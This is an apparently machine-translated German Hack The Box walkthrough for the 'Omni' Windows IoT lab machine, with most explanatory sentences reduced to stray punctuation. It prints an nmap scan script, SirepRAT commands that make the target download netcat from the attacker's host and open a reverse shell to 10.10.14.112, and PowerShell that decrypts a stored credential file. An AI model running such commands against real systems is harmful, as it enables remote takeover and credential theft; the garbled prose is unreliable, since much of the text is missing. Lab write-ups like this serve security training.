Hack The Box. Exemplarische Vorgehensweise Omni. Leichtes Windows IoT brechen





Ich veröffentliche weiterhin Lösungen, die zur Finalisierung von Maschinen von der HackTheBox-Website (https://www.hackthebox.eu) gesendet wurden. Ich hoffe, dies wird zumindest jemandem helfen, sich im Bereich der Informationssicherheit zu entwickeln.





Die Verbindung zum Labor erfolgt über VPN. Es wird empfohlen, keine Verbindung von einem Arbeitscomputer oder einem Host herzustellen, auf dem wichtige Daten für Sie vorhanden sind, da Sie sich in einem privaten Netzwerk mit Personen befinden, die etwas über Informationssicherheit wissen :)





Organisationsinformationen

, - , :





- PWN;





- (Crypto);





- c (Network);





-  (Reverse Engineering);





-  (Stegano);





- WEB-;





,  , , .





, , Telegram . , , ().





. , - , .





Recon

IP 10.10.10.204, /etc/hosts.





10.10.10.204    omni.htb
      
      



.   , - :





#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1
      
      



, 8080 HTTP “Windows Device Portal”. .





, IoT SirepRAT.





Entry Point

.





sudo python3 -m http.server 80
      
      



netcat, netcat.





python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell IWR -Uri http://10.10.14.112/nc64.exe -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe"

python SirepRAT.py omni.htb LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.112 4321" --v
      
      



.





PowerShell.  , , - . .





Get-ChildItem -Path "C:\Program Files"  –Recurse -force
      
      



. . .





USER

.





.





$userTXT = Import-CliXml -Path C:\Data\Users\app\user.txt
$userTXT.GetNetworkCredential().Password
      
      



ROOT

.





.








All Articles